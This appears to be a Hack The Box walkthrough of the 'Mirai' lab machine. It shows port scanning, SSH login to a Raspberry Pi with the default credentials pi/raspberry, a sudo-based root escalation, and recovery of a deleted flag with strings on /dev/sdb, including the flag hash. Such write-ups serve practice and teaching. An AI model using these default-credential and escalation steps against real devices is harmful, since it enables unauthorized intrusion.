hack the box walkthrough – Mirai machine
New easy linux HTB machine today, Mirai!
Difficulty mentioned is easy.. let’s find out.
enumeration
We don’t change now an old habit : let’s start with our nmapautomator scan:
[email protected]:~/Documents/nmapAutomator$ ./nmapAutomator.sh 10.129.82.188 Full
Running a Full scan on 10.129.82.188
Host is likely running Linux
---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-16 16:41 EST
Initiating Parallel DNS resolution of 1 host. at 16:41
Completed Parallel DNS resolution of 1 host. at 16:41, 0.01s elapsed
Initiating Connect Scan at 16:41
Scanning 10.129.82.188 [65535 ports]
Discovered open port 22/tcp on 10.129.82.188
Discovered open port 53/tcp on 10.129.82.188
Discovered open port 80/tcp on 10.129.82.188
Warning: 10.129.82.188 giving up on port because retransmission cap hit (1).
Discovered open port 32400/tcp on 10.129.82.188
Connect Scan Timing: About 23.03% done; ETC: 16:43 (0:01:44 remaining)
Connect Scan Timing: About 44.31% done; ETC: 16:43 (0:01:17 remaining)
Discovered open port 1450/tcp on 10.129.82.188
Connect Scan Timing: About 67.48% done; ETC: 16:43 (0:00:44 remaining)
Discovered open port 32469/tcp on 10.129.82.188
Completed Connect Scan at 16:43, 136.87s elapsed (65535 total ports)
Nmap scan report for 10.129.82.188
Host is up (0.025s latency).
Not shown: 65089 closed ports, 440 filtered ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
1450/tcp open dwf
32400/tcp open plex
32469/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 136.95 seconds
Making a script scan on extra ports: 1450, 32400, 32469
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-16 16:43 EST
Nmap scan report for 10.129.82.188
Host is up (0.029s latency).
PORT STATE SERVICE VERSION
1450/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open http Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.49 seconds
---------------------Finished all Nmap scans---------------------
Completed in 2 minute(s) and 30 second(s)
We have quite a few ports open on this machine..
Let’s start with the port 80. When I opened it with the web browser I got a blank page. I ran disbuster to check if any file or folder can be found.
The folder admin brings me to a Pi-hole dashboard.
Thanks to google, I have found the default credential of the SSH connection pi/raspberry
[email protected]:~$ ssh [email protected]
ssh: Could not resolve hostname h10.129.82.188: Name or service not known
[email protected]:~$ ssh [email protected]
[email protected]'s password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
[email protected]:~ $ whoami
pi
Privilege Escalation
A linpeas scan showed me that the user pi is member of the sudo group and I can use /tmp/shrndom with the sudo tokens exploit for privilege escalation
[email protected]:~ $ sudo /tmp/shrndom
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# cd /root
# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...Where is my flag?
Oh ok… I thought I was done here..
A new linpeas scan showed me the disk mounted on /media/usbdisk
# cd /media/usbstick
# ls -al
total 18
drwxr-xr-x 3 root root 1024 Aug 14 2017 .
drwxr-xr-x 3 root root 4096 Aug 14 2017 ..
-rw-r--r-- 1 root root 129 Aug 14 2017 damnit.txt
drwx------ 2 root root 12288 Aug 14 2017 lost+found
# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
Oh god.. have you done James ?
So I ran the following command to recover the root.txt file :
# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
